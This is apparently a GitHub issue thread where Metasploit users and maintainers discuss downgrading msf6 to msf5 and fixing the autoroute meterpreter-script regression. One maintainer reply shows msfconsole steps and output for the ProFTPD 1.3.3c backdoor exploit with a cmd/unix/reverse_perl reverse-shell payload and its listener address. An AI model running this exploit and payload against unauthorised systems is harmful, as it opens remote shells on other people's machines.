how to downgrade msf6 to msf5 in kali linux

[bibek1290]

how to downgrade msf6 to msf5 in kali linux

[adfoster-r7]

What problem are you facing?

[github-actions[bot]]

It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.

This includes:

• All of the item points within this tempate
• The result of the debug command in your Metasploit console
• Screenshots showing the issues you're having
• Exact replication steps

The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.

[jmartin-tech]

I also would be interested to know what problem you are facing in msf6 that msf5 will aid with.

To attempt to answer the question anyway, Kali's port of metasploit framework deploy's from the distro's own deb repository. You may be able to install an older deb package from the Kali repo however in most cases using the latest version is preferred.

The most portable way is to uninstall the kali package for metasploit and install a development environment using the github source which can then be checkout a specific version configuration and usage.

[saunders-jake]

https://github.com/Dewalt-arch/pimpmykali should help you

[adfoster-r7]

@saunders-jake Is there a particular bug in msf6 that you're running into? We can fix that, rather than have users downgrade to msf5 :+1:

[adfoster-r7]

After poking further, and checking out the course which suggests downgrading to msf5 - I believe the culprit is the autoroute functionality which is currently broken on msf6

[jmartin-tech]

Also depending on how being called autoroute was a meterpreter script that has been deprecated and should now be called using the post module.

[adfoster-r7]

I've a separate fix for patching meterpreter scripts before Thursday's release https://github.com/rapid7/metasploit-framework/pull/15542. We have a different internal ticket to look at migrating those scripts to be powered by post modules.

[bcoles]

@saunders-jake Is there a particular bug in msf6 that you're running into? We can fix that, rather than have users downgrade to msf5 +1

https://github.com/rapid7/metasploit-framework/issues/15347#issuecomment-862705842 :trollface:

[adfoster-r7]

Will drop a guess label that this might be related to meterpreter windows xp support as that's the only identified regression from 5.0.101 and 6.x. I've also fixed the meterpreter script/autoroute bug here https://github.com/rapid7/metasploit-framework/pull/15542.

Closing this off until there's more detail :+1:

[pabloFalco]

I'm testing an Ubuntu with ProFTPD 1.3.3c installed on port 21. msf6>search ProFTPD type:exploit When I try to set the exploit, to my surprise, I can't set LHOST, it is the first time that I see something like this, so that's why I want to downgrade.

[adfoster-r7]

@pabloFalco What is the output of the version command in your msfconsole?

Edit: You will need to set the payload yourself. You can see the available payloads show payloads. You can set a payload with set payload your_payload_name_here

I don't know if your target has perl available; but if it did - you could follow these steps

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.123.1    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

After configuring a payload LHOST can be set. You may require a different payload to successfully exploit your target.

[loverless123]

What are the upgrades from msf5 to msf6? Why doesn't the deep exploit model that can be trained in msf5 work in msf6, apart from the increase in payload and exploit?